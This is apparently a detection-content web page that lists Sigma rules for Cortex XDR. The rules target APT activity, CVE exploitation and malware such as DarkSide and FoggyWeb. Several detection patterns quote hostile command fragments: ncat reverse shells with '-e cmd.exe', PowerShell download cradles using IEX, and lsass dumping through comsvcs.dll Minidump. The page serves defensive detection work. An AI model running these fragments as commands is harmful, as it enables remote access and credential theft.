Palo Alto Cortex XDR
1,524 rules · Sigma detections in Palo Alto Cortex XDR syntax
The same Sigma detection corpus, machine-rendered into Palo Alto Cortex XDR query syntax and ready to paste. Switch platforms above for identical coverage in another language, or choose Sigma (generic) for the portable YAML.
Download all 1,524 rules (.zip, 675 KB)
Every Palo Alto Cortex XDR query in this view, packaged to deploy.
Filter by technique (pick techniques from the ATT&CK matrix):
- Reconnaissance (4)
- Resource Development (5)
- Initial Access (7)
- Execution (25)
- Persistence (31)
- Privilege Escalation (17)
- Stealth (63)
- Defense Impairment (16)
- Credential Access (26)
- Discovery (24)
- Lateral Movement (10)
- Collection (11)
- Command and Control (18)
- Exfiltration (7)
- Impact (10)
Using these Sigma rules
Deploy. Pick your SIEM above and paste the rendered query straight into a saved search or detection rule, or expand any rule to convert its generic YAML inline to the language you run.
Adapt. Map the field names to your log schema - Sigma assumes a normalised taxonomy - and tune thresholds and timeframes to your own baseline before you trust the alert.
Validate. Every rule is mapped to ATT&CK, so run the matching Atomic Red Team test on /atomic to confirm the rule actually fires before you rely on it.
Judge. Each rule shows a quality tier (Strong / Moderate / Basic) and an estimated alert-volume tier (Low / Medium / High FP), both scored deterministically from the rule's shape - status, detection depth, match breadth, log source, documented false positives and references. A rule existing is not the same as a rule being good, or being quiet; hover either tier for the breakdown. The FP estimate reads rule shape, not a measured rate, so use it to pick what to tune first before you deploy.
Detection rules
50 shown of 1,524

critical · Strong · Medium FP
APT27 - Emissary Panda Activity
Detects the execution of DLL side-loading malware used by threat group Emissary Panda aka APT27
Sigma YAML:
title: APT27 - Emissary Panda Activity
id: 9aa01d62-7667-4d3b-acb8-8cb5103e2014
status: test
description: Detects the execution of DLL side-loading malware used by threat group Emissary Panda aka APT27
references:
    - https://app.any.run/tasks/579e7587-f09d-4aae-8b07-472833262965
    - https://twitter.com/cyb3rops/status/1168863899531132929
    - https://research.nccgroup.com/2018/05/18/emissary-panda-a-potential-new-malicious-tool/
author: Florian Roth (Nextron Systems)
date: 2018-09-03
modified: 2023-03-09
tags:
    - attack.privilege-escalation
    - attack.persistence
    - attack.execution
    - attack.stealth
    - attack.t1574.001
    - attack.g0027
    - detection.emerging-threats
logsource:
    category: process_creation
    product: windows
detection:
    selection_sllauncher:
        ParentImage|endswith: '\sllauncher.exe'
        Image|endswith: '\svchost.exe'
    selection_svchost:
        ParentImage|contains: '\AppData\Roaming\'
        Image|endswith: '\svchost.exe'
        CommandLine|contains: '-k'
    condition: 1 of selection_*
falsepositives:
    - Unlikely
level: critical

critical · Strong · High FP
APT29 2018 Phishing Campaign CommandLine Indicators
Detects indicators of APT 29 (Cozy Bear) phishing-campaign as reported by mandiant
Sigma YAML:
title: APT29 2018 Phishing Campaign CommandLine Indicators
id: 7453575c-a747-40b9-839b-125a0aae324b
related:
    - id: 033fe7d6-66d1-4240-ac6b-28908009c71f
      type: obsolete
status: stable
description: Detects indicators of APT 29 (Cozy Bear) phishing-campaign as reported by mandiant
references:
    - https://twitter.com/DrunkBinary/status/1063075530180886529
    - https://www.microsoft.com/security/blog/2018/12/03/analysis-of-cyberattack-on-u-s-think-tanks-non-profits-public-sector-by-unidentified-attackers/
    - https://www.mandiant.com/resources/blog/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign
author: Florian Roth (Nextron Systems), @41thexplorer
date: 2018-11-20
modified: 2023-03-08
tags:
    - attack.execution
    - attack.stealth
    - attack.t1218.011
    - detection.emerging-threats
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        - CommandLine|contains: '-noni -ep bypass $'
        - CommandLine|contains|all:
              - 'cyzfc.dat,'
              - 'PointFunctionCall'
    condition: selection
falsepositives:
    - Unlikely
level: critical

critical · Moderate · High FP
APT29 2018 Phishing Campaign File Indicators
Detects indicators of APT 29 (Cozy Bear) phishing-campaign as reported by mandiant
Sigma YAML:
title: APT29 2018 Phishing Campaign File Indicators
id: 3a3f81ca-652c-482b-adeb-b1c804727f74
related:
    - id: 7453575c-a747-40b9-839b-125a0aae324b # ProcessCreation
      type: derived
status: stable
description: Detects indicators of APT 29 (Cozy Bear) phishing-campaign as reported by mandiant
references:
    - https://twitter.com/DrunkBinary/status/1063075530180886529
    - https://www.mandiant.com/resources/blog/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign
author: '@41thexplorer'
date: 2018-11-20
modified: 2023-02-20
tags:
    - attack.stealth
    - attack.t1218.011
    - detection.emerging-threats
logsource:
    product: windows
    category: file_event
detection:
    selection:
        TargetFilename|contains:
            - 'ds7002.lnk'
            - 'ds7002.pdf'
            - 'ds7002.zip'
    condition: selection
falsepositives:
    - Unlikely
level: critical

critical · Moderate · Medium FP
APT31 Judgement Panda Activity
Detects APT31 Judgement Panda activity as described in the Crowdstrike 2019 Global Threat Report
Sigma YAML:
title: APT31 Judgement Panda Activity
id: 03e2746e-2b31-42f1-ab7a-eb39365b2422
status: test
description: Detects APT31 Judgement Panda activity as described in the Crowdstrike 2019 Global Threat Report
references:
    - https://www.documentcloud.org/documents/5743766-Global-Threat-Report-2019.html
author: Florian Roth (Nextron Systems)
date: 2019-02-21
modified: 2023-03-10
tags:
    - attack.collection
    - attack.lateral-movement
    - attack.credential-access
    - attack.g0128
    - attack.t1003.001
    - attack.t1560.001
    - detection.emerging-threats
logsource:
    category: process_creation
    product: windows
detection:
    selection_ldifde:
        CommandLine|contains|all:
            - 'ldifde'
            - '-f -n'
            - 'eprod.ldf'
    selection_lateral_movement:
        CommandLine|contains|all:
            - 'copy \\\\'
            - 'c$'
        CommandLine|contains:
            - '\aaaa\procdump64.exe'
            - '\aaaa\netsess.exe'
            - '\aaaa\7za.exe'
            - '\c$\aaaa\'
    condition: 1 of selection_*
falsepositives:
    - Unlikely
level: critical

critical · Moderate · Medium FP
COLDSTEEL RAT Cleanup Command Execution
Detects the creation of a "rundll32" process from the ColdSteel persistence service to initiate the cleanup command by calling one of its own exports. This functionality is not present in "MileStone2017" and some "MileStone2016" samples
Sigma YAML:
title: COLDSTEEL RAT Cleanup Command Execution
id: 88516f06-ebe0-47ad-858e-ae9fd060ddea
status: test
description: Detects the creation of a "rundll32" process from the ColdSteel persistence service to initiate the cleanup command by calling one of its own exports. This functionality is not present in "MileStone2017" and some "MileStone2016" samples
references:
    - https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/cold-steel/NCSC-MAR-Cold-Steel.pdf
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-04-30
tags:
    - attack.persistence
    - detection.emerging-threats
    - attack.stealth
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        ParentImage|endswith: '\svchost.exe'
        ParentCommandLine|contains:
            - ' -k msupdate'
            - ' -k msupdate2'
            - ' -k alg'
        Image|endswith: '\rundll32.exe'
        CommandLine|contains:
            - 'UpdateDriverForPlugAndPlayDevicesW'
            - 'ServiceMain'
            - 'DiUninstallDevice'
    condition: selection
falsepositives:
    - Unlikely
level: critical

critical · Moderate · Medium FP
COLDSTEEL RAT Service Persistence Execution
Detects the creation of an "svchost" process with specific command line flags, that were seen present and used by ColdSteel RAT
Sigma YAML:
title: COLDSTEEL RAT Service Persistence Execution
id: 9f9cd389-cea0-4142-bf1a-a3fd424abedd
status: test
description: Detects the creation of an "svchost" process with specific command line flags, that were seen present and used by ColdSteel RAT
references:
    - https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/cold-steel/NCSC-MAR-Cold-Steel.pdf
author: X__Junior (Nextron Systems)
date: 2023-04-30
tags:
    - attack.persistence
    - detection.emerging-threats
    - attack.stealth
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith: '\svchost.exe'
        CommandLine|endswith:
            - ' -k msupdate'
            - ' -k msupdate2'
            - ' -k alg'
    condition: selection
falsepositives:
    - Unlikely
level: critical

critical · Moderate · High FP
CVE-2021-1675 Print Spooler Exploitation Filename Pattern
Detects the default filename used in PoC code against print spooler vulnerability CVE-2021-1675
Sigma YAML:
title: CVE-2021-1675 Print Spooler Exploitation Filename Pattern
id: 2131cfb3-8c12-45e8-8fa0-31f5924e9f07
status: test
description: Detects the default filename used in PoC code against print spooler vulnerability CVE-2021-1675
references:
    - https://web.archive.org/web/20210629055600/https://github.com/hhlxf/PrintNightmare/
    - https://web.archive.org/web/20210701042336/https://github.com/afwu/PrintNightmare
    - https://github.com/cube0x0/CVE-2021-1675
author: Florian Roth (Nextron Systems)
date: 2021-06-29
modified: 2022-12-25
tags:
    - attack.execution
    - attack.privilege-escalation
    - attack.resource-development
    - attack.t1587
    - cve.2021-1675
    - detection.emerging-threats
logsource:
    category: file_event
    product: windows
detection:
    selection:
        TargetFilename|contains: 'C:\Windows\System32\spool\drivers\x64\3\old\1\123'
    condition: selection
falsepositives:
    - Unknown
level: critical

critical · Moderate · Medium FP
CVE-2021-31979 CVE-2021-33771 Exploits
Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum
Sigma YAML:
title: CVE-2021-31979 CVE-2021-33771 Exploits
id: 32b5db62-cb5f-4266-9639-0fa48376ac00
status: test
description: Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum
references:
    - https://www.microsoft.com/security/blog/2021/07/15/protecting-customers-from-a-private-sector-offensive-actor-using-0-day-exploits-and-devilstongue-malware/
    - https://citizenlab.ca/2021/07/hooking-candiru-another-mercenary-spyware-vendor-comes-into-focus/
author: Sittikorn S, frack113
date: 2021-07-16
modified: 2023-08-17
tags:
    - attack.initial-access
    - attack.execution
    - attack.credential-access
    - attack.t1566
    - attack.t1203
    - cve.2021-33771
    - cve.2021-31979
    - detection.emerging-threats
    # - threat_group.Sourgum
logsource:
    product: windows
    category: registry_set
detection:
    selection:
        TargetObject|endswith:
            - CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32\(Default)
            - CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\InProcServer32\(Default)
    filter:
        Details|endswith:
            - system32\wbem\wmiutils.dll
            - system32\wbem\wbemsvc.dll
    condition: selection and not filter
falsepositives:
    - Unlikely
level: critical

critical · Moderate · High FP
CVE-2021-31979 CVE-2021-33771 Exploits by Sourgum
Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum
Sigma YAML:
title: CVE-2021-31979 CVE-2021-33771 Exploits by Sourgum
id: ad7085ac-92e4-4b76-8ce2-276d2c0e68ef
status: test
description: Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum
references:
    - https://www.microsoft.com/security/blog/2021/07/15/protecting-customers-from-a-private-sector-offensive-actor-using-0-day-exploits-and-devilstongue-malware/
    - https://citizenlab.ca/2021/07/hooking-candiru-another-mercenary-spyware-vendor-comes-into-focus/
author: Sittikorn S
date: 2021-07-16
modified: 2022-10-09
tags:
    - attack.initial-access
    - attack.execution
    - attack.credential-access
    - attack.t1566
    - attack.t1203
    - cve.2021-33771
    - cve.2021-31979
    - detection.emerging-threats
    # - threat_group.Sourgum
logsource:
    product: windows
    category: file_event
detection:
    selection:
        TargetFilename|contains:
            - 'C:\Windows\system32\physmem.sys'
            - 'C:\Windows\System32\IME\IMEJP\imjpueact.dll'
            - 'C:\Windows\system32\ime\IMETC\IMTCPROT.DLL'
            - 'C:\Windows\system32\ime\SHARED\imecpmeid.dll'
            - 'C:\Windows\system32\config\spp\ServiceState\Recovery\pac.dat'
            - 'C:\Windows\system32\config\cy-GB\Setup\SKB\InputMethod\TupTask.dat'
            - 'C:\Windows\system32\config\config\startwus.dat'
            - 'C:\Windows\system32\ime\SHARED\WimBootConfigurations.ini'
            - 'C:\Windows\system32\ime\IMEJP\WimBootConfigurations.ini'
            - 'C:\Windows\system32\ime\IMETC\WimBootConfigurations.ini'
    condition: selection
falsepositives:
    - Unlikely
level: critical

critical · Strong · Medium FP
DNS RCE CVE-2020-1350
Detects exploitation of DNS RCE bug reported in CVE-2020-1350 by the detection of suspicious sub process
Sigma YAML:
title: DNS RCE CVE-2020-1350
id: b5281f31-f9cc-4d0d-95d0-45b91c45b487
status: test
description: Detects exploitation of DNS RCE bug reported in CVE-2020-1350 by the detection of suspicious sub process
references:
    - https://research.checkpoint.com/2020/resolving-your-way-into-domain-admin-exploiting-a-17-year-old-bug-in-windows-dns-servers/
    - https://web.archive.org/web/20230329172447/https://blog.menasec.net/2019/02/threat-hunting-24-microsoft-windows-dns.html
author: Florian Roth (Nextron Systems)
date: 2020-07-15
modified: 2022-07-12
tags:
    - attack.initial-access
    - attack.t1190
    - attack.execution
    - attack.t1569.002
    - cve.2020-1350
    - detection.emerging-threats
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        ParentImage|endswith: '\System32\dns.exe'
    filter:
        Image|endswith:
            - '\System32\werfault.exe'
            - '\System32\conhost.exe'
            - '\System32\dnscmd.exe'
            - '\System32\dns.exe'
    condition: selection and not filter
falsepositives:
    - Unknown but benign sub processes of the Windows DNS service dns.exe
level: critical

critical · Strong · Medium FP
DarkSide Ransomware Pattern
Detects DarkSide Ransomware and helpers
Sigma YAML:
title: DarkSide Ransomware Pattern
id: 965fff6c-1d7e-4e25-91fd-cdccd75f7d2c
status: test
description: Detects DarkSide Ransomware and helpers
references:
    - https://www.fireeye.com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-operations.html
    - https://app.any.run/tasks/8b9a571b-bcc1-4783-ba32-df4ba623b9c0/
    - https://www.joesandbox.com/analysis/411752/0/html#7048BB9A06B8F2DD9D24C77F389D7B2B58D2
author: Florian Roth (Nextron Systems)
date: 2021-05-14
tags:
    - attack.execution
    - attack.t1204
    - detection.emerging-threats
logsource:
    category: process_creation
    product: windows
detection:
    selection1:
        CommandLine|contains:
            - '=[char][byte](''0x''+'
            - ' -work worker0 -path '
    selection2:
        ParentCommandLine|contains: 'DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}'
        Image|contains: '\AppData\Local\Temp\'
    condition: 1 of selection*
falsepositives:
    - Unknown
    - UAC bypass method used by other malware
level: critical

critical · Strong · High FP
Droppers Exploiting CVE-2017-11882
Detects exploits that use CVE-2017-11882 to start EQNEDT32.EXE and other sub processes like mshta.exe
Sigma YAML:
title: Droppers Exploiting CVE-2017-11882
id: 678eb5f4-8597-4be6-8be7-905e4234b53a
status: stable
description: Detects exploits that use CVE-2017-11882 to start EQNEDT32.EXE and other sub processes like mshta.exe
references:
    - https://www.hybrid-analysis.com/sample/2a4ae284c76f868fc51d3bb65da8caa6efacb707f265b25c30f34250b76b7507?environmentId=100
    - https://www.linkedin.com/pulse/exploit-available-dangerous-ms-office-rce-vuln-called-thebenygreen-
    - https://github.com/embedi/CVE-2017-11882
author: Florian Roth (Nextron Systems)
date: 2017-11-23
modified: 2021-11-27
tags:
    - attack.execution
    - attack.t1203
    - attack.t1204.002
    - attack.initial-access
    - attack.t1566.001
    - cve.2017-11882
    - detection.emerging-threats
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        ParentImage|endswith: '\EQNEDT32.EXE'
    condition: selection
falsepositives:
    - Unknown
level: critical

critical · Moderate · High FP
DumpStack.log Defender Evasion
Detects the use of the filename DumpStack.log to evade Microsoft Defender
Sigma YAML:
title: DumpStack.log Defender Evasion
id: 4f647cfa-b598-4e12-ad69-c68dd16caef8
status: test
description: Detects the use of the filename DumpStack.log to evade Microsoft Defender
references:
    - https://twitter.com/mrd0x/status/1479094189048713219
author: Florian Roth (Nextron Systems)
date: 2022-01-06
modified: 2022-06-17
tags:
    - attack.defense-impairment
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith: '\DumpStack.log'
    selection_download:
        CommandLine|contains: ' -o DumpStack.log'
    condition: 1 of selection*
falsepositives:
    - Unknown
level: critical

critical · Strong · Medium FP
Elise Backdoor Activity
Detects Elise backdoor activity used by APT32
Sigma YAML:
title: Elise Backdoor Activity
id: e507feb7-5f73-4ef6-a970-91bb6f6d744f
status: test
description: Detects Elise backdoor activity used by APT32
references:
    - https://community.rsa.com/community/products/netwitness/blog/2018/02/13/lotus-blossom-continues-asean-targeting
    - https://web.archive.org/web/20200302083912/https://www.accenture.com/t20180127T003755Z_w_/us-en/_acnmedia/PDF-46/Accenture-Security-Dragonfish-Threat-Analysis.pdf
author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
date: 2018-01-31
modified: 2023-03-09
tags:
    - attack.g0030
    - attack.g0050
    - attack.s0081
    - attack.execution
    - attack.t1059.003
    - detection.emerging-threats
logsource:
    category: process_creation
    product: windows
detection:
    selection_other_svchost:
        Image|endswith: '\Microsoft\Network\svchost.exe'
    selection_other_del:
        CommandLine|contains|all:
            - '\Windows\Caches\NavShExt.dll'
            - '/c del'
    selection_dll_path:
        CommandLine|endswith:
            - '\AppData\Roaming\MICROS~1\Windows\Caches\NavShExt.dll'
            - '\AppData\Roaming\Microsoft\Windows\Caches\NavShExt.dll'
    selection_dll_function:
        CommandLine|contains: ',Setting'
    condition: 1 of selection_other_* or all of selection_dll_*
falsepositives:
    - Unlikely
level: critical

critical · Moderate · High FP
Equation Group DLL_U Export Function Load
Detects a specific export function name used by one of EquationGroup tools
Sigma YAML:
title: Equation Group DLL_U Export Function Load
id: d465d1d8-27a2-4cca-9621-a800f37cf72e
status: stable
description: Detects a specific export function name used by one of EquationGroup tools
references:
    - https://github.com/00derp/EquationGroupLeak/search?utf8=%E2%9C%93&q=dll_u&type=
    - https://twitter.com/cyb3rops/status/972186477512839170
author: Florian Roth (Nextron Systems)
date: 2019-03-04
modified: 2023-03-09
tags:
    - attack.stealth
    - attack.g0020
    - attack.t1218.011
    - detection.emerging-threats
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        - CommandLine|contains: '-export dll_u'
        - CommandLine|endswith:
              - ',dll_u'
              - ' dll_u'
    condition: selection
falsepositives:
    - Unlikely
level: critical

critical · Moderate · High FP
EvilNum APT Golden Chickens Deployment Via OCX Files
Detects Golden Chickens deployment method as used by Evilnum and described in ESET July 2020 report
Sigma YAML:
title: EvilNum APT Golden Chickens Deployment Via OCX Files
id: 8acf3cfa-1e8c-4099-83de-a0c4038e18f0
status: test
description: Detects Golden Chickens deployment method as used by Evilnum and described in ESET July 2020 report
references:
    - https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/
    - https://app.any.run/tasks/33d37fdf-158d-4930-aa68-813e1d5eb8ba/
author: Florian Roth (Nextron Systems)
date: 2020-07-10
modified: 2023-03-09
tags:
    - attack.stealth
    - attack.t1218.011
    - detection.emerging-threats
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains|all:
            - 'regsvr32'
            - '/s'
            - '/i'
            - '\AppData\Roaming\'
            - '.ocx'
    condition: selection
falsepositives:
    - Unknown
level: critical

critical · Strong · Medium FP
Exploit for CVE-2015-1641
Detects Winword starting uncommon sub process MicroScMgmt.exe as used in exploits for CVE-2015-1641
Sigma YAML:
title: Exploit for CVE-2015-1641
id: 7993792c-5ce2-4475-a3db-a3a5539827ef
status: stable
description: Detects Winword starting uncommon sub process MicroScMgmt.exe as used in exploits for CVE-2015-1641
references:
    - https://www.virustotal.com/en/file/5567408950b744c4e846ba8ae726883cb15268a539f3bb21758a466e47021ae8/analysis/
    - https://www.hybrid-analysis.com/sample/5567408950b744c4e846ba8ae726883cb15268a539f3bb21758a466e47021ae8?environmentId=100
author: Florian Roth (Nextron Systems)
date: 2018-02-22
modified: 2021-11-27
tags:
    - attack.stealth
    - attack.t1036.005
    - cve.2015-1641
    - detection.emerging-threats
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        ParentImage|endswith: '\WINWORD.EXE'
        Image|endswith: '\MicroScMgmt.exe'
    condition: selection
falsepositives:
    - Unknown
level: critical

critical · Moderate · Medium FP
Exploit for CVE-2017-8759
Detects Winword starting uncommon sub process csc.exe as used in exploits for CVE-2017-8759
Sigma YAML:
title: Exploit for CVE-2017-8759
id: fdd84c68-a1f6-47c9-9477-920584f94905
status: test
description: Detects Winword starting uncommon sub process csc.exe as used in exploits for CVE-2017-8759
references:
    - https://www.hybrid-analysis.com/sample/0b4ef455e385b750d9f90749f1467eaf00e46e8d6c2885c260e1b78211a51684?environmentId=100
    - https://www.reverse.it/sample/0b4ef455e385b750d9f90749f1467eaf00e46e8d6c2885c260e1b78211a51684?environmentId=100
author: Florian Roth (Nextron Systems)
date: 2017-09-15
modified: 2021-11-27
tags:
    - attack.execution
    - attack.t1203
    - attack.t1204.002
    - attack.initial-access
    - attack.t1566.001
    - cve.2017-8759
    - detection.emerging-threats
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        ParentImage|endswith: '\WINWORD.EXE'
        Image|endswith: '\csc.exe'
    condition: selection
falsepositives:
    - Unknown
level: critical

critical · Strong · Medium FP
Exploiting CVE-2019-1388
Detects an exploitation attempt in which the UAC consent dialogue is used to invoke an Internet Explorer process running as LOCAL_SYSTEM
Sigma YAML:
title: Exploiting CVE-2019-1388
id: 02e0b2ea-a597-428e-b04a-af6a1a403e5c
status: stable
description: Detects an exploitation attempt in which the UAC consent dialogue is used to invoke an Internet Explorer process running as LOCAL_SYSTEM
references:
    - https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1388
    - https://www.zerodayinitiative.com/blog/2019/11/19/thanksgiving-treat-easy-as-pie-windows-7-secure-desktop-escalation-of-privilege
author: Florian Roth (Nextron Systems)
date: 2019-11-20
modified: 2024-12-01
tags:
    - attack.privilege-escalation
    - attack.t1068
    - cve.2019-1388
    - detection.emerging-threats
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        ParentImage|endswith: '\consent.exe'
        Image|endswith: '\iexplore.exe'
        CommandLine|contains: ' http'
    selection_rights:
        - IntegrityLevel:
              - 'System' # for Sysmon users
              - 'S-1-16-16384' # System
        - User|contains: # covers many language settings
              - 'AUTHORI'
              - 'AUTORI'
    condition: all of selection_*
falsepositives:
    - Unknown
level: critical

critical · Moderate · High FP
FlowCloud Registry Markers
Detects FlowCloud malware registry markers from threat group TA410.
The malware stores its configuration in the registry alongside drivers utilized by the malware's keylogger components.
Sigma YAML:
title: FlowCloud Registry Markers
id: 5118765f-6657-4ddb-a487-d7bd673abbf1
status: test
description: |
    Detects FlowCloud malware registry markers from threat group TA410.
    The malware stores its configuration in the registry alongside drivers utilized by the malware's keylogger components.
references:
    - https://www.proofpoint.com/us/blog/threat-insight/ta410-group-behind-lookback-attacks-against-us-utilities-sector-returns-new
author: NVISO
date: 2020-06-09
modified: 2024-03-20
tags:
    - attack.persistence
    - attack.defense-impairment
    - attack.t1112
    - detection.emerging-threats
logsource:
    product: windows
    category: registry_event
detection:
    selection:
        TargetObject|contains:
            - '\HARDWARE\{2DB80286-1784-48b5-A751-B6ED1F490303}'
            - '\HARDWARE\{804423C2-F490-4ac3-BFA5-13DEDE63A71A}'
            - '\HARDWARE\{A5124AF5-DF23-49bf-B0ED-A18ED3DEA027}'
            - '\SYSTEM\Setup\PrintResponsor\'
    condition: selection
falsepositives:
    - Unlikely
level: critical

critical · Moderate · Medium FP
FoggyWeb Backdoor DLL Loading
Detects DLL hijacking technique used by NOBELIUM in their FoggyWeb backdoor. Which loads a malicious version of the expected "version.dll" dll
Sigma YAML:
title: FoggyWeb Backdoor DLL Loading
id: 640dc51c-7713-4faa-8a0e-e7c0d9d4654c
status: test
description: Detects DLL hijacking technique used by NOBELIUM in their FoggyWeb backdoor. Which loads a malicious version of the expected "version.dll" dll
references:
    - https://www.microsoft.com/security/blog/2021/09/27/foggyweb-targeted-nobelium-malware-leads-to-persistent-backdoor/
author: Florian Roth (Nextron Systems)
date: 2021-09-27
modified: 2022-12-09
tags:
    - attack.resource-development
    - attack.t1587
    - detection.emerging-threats
logsource:
    category: image_load
    product: windows
detection:
    selection:
        ImageLoaded: 'C:\Windows\ADFS\version.dll'
    condition: selection
falsepositives:
    - Unlikely
level: critical

critical · Strong · Medium FP
Greenbug Espionage Group Indicators
Detects tools and process executions used by Greenbug in their May 2020 campaign as reported by Symantec
Sigma YAML:
title: Greenbug Espionage Group Indicators
id: 3711eee4-a808-4849-8a14-faf733da3612
status: test
description: Detects tools and process executions used by Greenbug in their May 2020 campaign as reported by Symantec
references:
    - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/greenbug-espionage-telco-south-asia
author: Florian Roth (Nextron Systems)
date: 2020-05-20
modified: 2023-03-09
tags:
    - attack.stealth
    - attack.g0049
    - attack.execution
    - attack.t1059.001
    - attack.command-and-control
    - attack.t1105
    - attack.t1036.005
    - detection.emerging-threats
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        Image|endswith:
            - ':\ProgramData\adobe\Adobe.exe'
            - ':\ProgramData\oracle\local.exe'
            - '\revshell.exe'
            - '\infopagesbackup\ncat.exe'
            - ':\ProgramData\comms\comms.exe'
    selection_msf:
        CommandLine|contains|all:
            - '-ExecutionPolicy Bypass -File'
            - '\msf.ps1'
    selection_ncat:
        CommandLine|contains|all:
            - 'infopagesbackup'
            - '\ncat'
            - '-e cmd.exe'
    selection_powershell:
        CommandLine|contains:
            - 'system.Data.SqlClient.SqlDataAdapter($cmd); [void]$da.fill'
            - '-nop -w hidden -c $k=new-object'
            - '[Net.CredentialCache]::DefaultCredentials;IEX '
            - ' -nop -w hidden -c $m=new-object net.webclient;$m'
            - '-noninteractive -executionpolicy bypass whoami'
            - '-noninteractive -executionpolicy bypass netstat -a'
    selection_other:
        CommandLine|contains: 'L3NlcnZlcj1' # base64 encoded '/server='
    condition: 1 of selection_*
falsepositives:
    - Unlikely
level: critical

critical · Moderate · High FP
Griffon Malware Attack Pattern
Detects process execution patterns related to Griffon malware as reported by Kaspersky
Sigma YAML:
title: Griffon Malware Attack Pattern
id: bcc6f179-11cd-4111-a9a6-0fab68515cf7
status: test
description: Detects process execution patterns related to Griffon malware as reported by Kaspersky
references:
    - https://securelist.com/fin7-5-the-infamous-cybercrime-rig-fin7-continues-its-activities/90703/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-03-09
tags:
    - attack.execution
    - detection.emerging-threats
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains|all:
            - '\local\temp\'
            - '//b /e:jscript'
            - '.txt'
    condition: selection
falsepositives:
    - Unlikely
level: critical

critical · Strong · Medium FP
HAFNIUM Exchange Exploitation Activity
Detects activity observed by different researchers to be HAFNIUM group activity (or related) on Exchange servers
Sigma YAML:
title: HAFNIUM Exchange Exploitation Activity
id: bbb2dedd-a0e3-46ab-ba6c-6c82ae7a9aa7
status: test
description: Detects activity observed by different researchers to be HAFNIUM group activity (or related) on Exchange servers
references:
    - https://blog.truesec.com/2021/03/07/exchange-zero-day-proxylogon-and-hafnium/
    - https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/
    - https://discuss.elastic.co/t/detection-and-response-for-hafnium-activity/266289/3
    - https://twitter.com/GadixCRK/status/1369313704869834753?s=20
    - https://twitter.com/BleepinComputer/status/1372218235949617161
author: Florian Roth (Nextron Systems)
date: 2021-03-09
modified: 2023-03-09
tags:
    - attack.privilege-escalation
    - attack.execution
    - attack.persistence
    - attack.t1546
    - attack.t1053
    - attack.g0125
    - detection.emerging-threats
logsource:
    category: process_creation
    product: windows
detection:
    selection_attrib:
        CommandLine|contains|all:
            - 'attrib'
            - ' +h '
            - ' +s '
            - ' +r '
            - '.aspx'
    selection_vsperfmon:
        - Image|contains: '\ProgramData\VSPerfMon\'
        - CommandLine|contains|all:
              - 'schtasks'
              - 'VSPerfMon'
    selection_opera_1:
        Image|endswith: 'Opera_browser.exe'
        ParentImage|endswith:
            - '\services.exe'
            - '\svchost.exe'
    selection_opera_2:
        Image|endswith: 'Users\Public\opera\Opera_browser.exe'
    selection_vssadmin:
        CommandLine|contains|all:
            - 'vssadmin list shadows'
            - 'Temp\__output'
    selection_makecab_1:
        Image|endswith: '\makecab.exe'
        CommandLine|contains|all:
            - 'inetpub\wwwroot\'
            - '.dmp.zip'
    selection_makecab_2:
        Image|endswith: '\makecab.exe'
        CommandLine|contains:
            - 'Microsoft\Exchange Server\'
            - 'compressionmemory'
            - '.gif'
    selection_7zip:
        CommandLine|contains|all:
            - ' -t7z '
            - 'C:\Programdata\pst'
            - '\it.zip'
    selection_rundll32:
        CommandLine|contains|all:
            - '\comsvcs.dll'
            - 'Minidump'
            - 'full '
            - '\inetpub\wwwroot'
    selection_other:
        CommandLine|contains:
            - 'Windows\Temp\xx.bat'
            - 'Windows\WwanSvcdcs'
            - 'Windows\Temp\cw.exe'
    condition: 1 of selection*
falsepositives:
    - Unlikely
level: critical

critical · Moderate · High FP
HackTool - DInjector PowerShell Cradle Execution
Detects the use of the Dinject PowerShell cradle based on the specific flags
Sigma YAML:
title: HackTool - DInjector PowerShell Cradle Execution
id: d78b5d61-187d-44b6-bf02-93486a80de5a
status: test
description: Detects the use of the Dinject PowerShell cradle based on the specific flags
references:
    - https://web.archive.org/web/20211001064856/https://github.com/snovvcrash/DInjector # Original got deleted. This is a fork
author: Florian Roth (Nextron Systems)
date: 2021-12-07
modified: 2023-02-04
tags:
    - attack.privilege-escalation
    - attack.stealth
    - attack.t1055
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains|all:
            - ' /am51'
            - ' /password'
    condition: selection
falsepositives:
    - Unlikely
level: critical
critical
Moderate
High FP
HackTool - Dumpert Process Dumper Default File
Detects the creation of the default dump file used by Outflank Dumpert tool. A process dumper, which dumps the lsass process memory
view Sigma YAML
